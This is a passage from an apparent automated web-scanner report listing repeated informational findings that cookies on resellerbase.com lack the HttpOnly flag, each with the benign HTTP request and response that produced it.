Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.48. http://www.resellerbase.com/detail/44/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:16:25 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:16:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/44/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=44&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:16:25 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:16:25 GMT; path=/
Location: /detail/44/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.49. http://www.resellerbase.com/detail/45/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:38 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/45/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=45&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:38 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:38 GMT; path=/
Location: /detail/45/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.50. http://www.resellerbase.com/detail/46/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:08:55 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:08:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/46/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=46&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:08:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:08:55 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:08:55 GMT; path=/
Location: /detail/46/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.51. http://www.resellerbase.com/detail/5/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:03:15 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:03:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=5&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:03:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:03:15 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:03:15 GMT; path=/
Location: /detail/5/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.52. http://www.resellerbase.com/detail/6/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:02:03 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:02:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/6/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=6&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:02:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:02:03 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:02:03 GMT; path=/
Location: /detail/6/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.53. http://www.resellerbase.com/detail/7/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:19:16 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:19:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/7/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=7&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:19:16 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:19:16 GMT; path=/
Location: /detail/7/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.54. http://www.resellerbase.com/detail/8/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:17:59 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:17:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/8/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=8&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:18:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:17:59 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:17:59 GMT; path=/
Location: /detail/8/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.55. http://www.resellerbase.com/detail/9/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:18:35 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:18:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=9&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:18:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:18:35 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:18:35 GMT; path=/
Location: /detail/9/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.56. http://www.resellerbase.com/goods-wholesale/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /goods-wholesale/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /goods-wholesale/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.57. http://www.resellerbase.com/power_search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/power_search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 22:57:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.58. http://www.resellerbase.com/resources-information/ebooks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resources-information/ebooks/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:49:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /resources-information/ebooks/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.59. http://www.resellerbase.com/tag/TGP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/TGP

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/TGP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/TGP
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.60. http://www.resellerbase.com/tag/VOIP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/VOIP

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/VOIP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/VOIP
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.61. http://www.resellerbase.com/tag/adult previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/adult
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.62. http://www.resellerbase.com/tag/adult+content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult+content

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/adult+content HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/adult+content
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.63. http://www.resellerbase.com/tag/broadband previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/broadband

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/broadband HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/broadband
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.64. http://www.resellerbase.com/tag/cam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cam

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/cam
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.65. http://www.resellerbase.com/tag/cellular previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/cellular

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/cellular HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/cellular
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.66. http://www.resellerbase.com/tag/chat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/chat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/chat
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.67. http://www.resellerbase.com/tag/dating previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dating

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/dating HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/dating
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.68. http://www.resellerbase.com/tag/domain previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domain HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domain
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.69. http://www.resellerbase.com/tag/domain+name previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+name

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domain+name HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domain+name
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.70. http://www.resellerbase.com/tag/domain+names previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domain+names

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domain+names HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
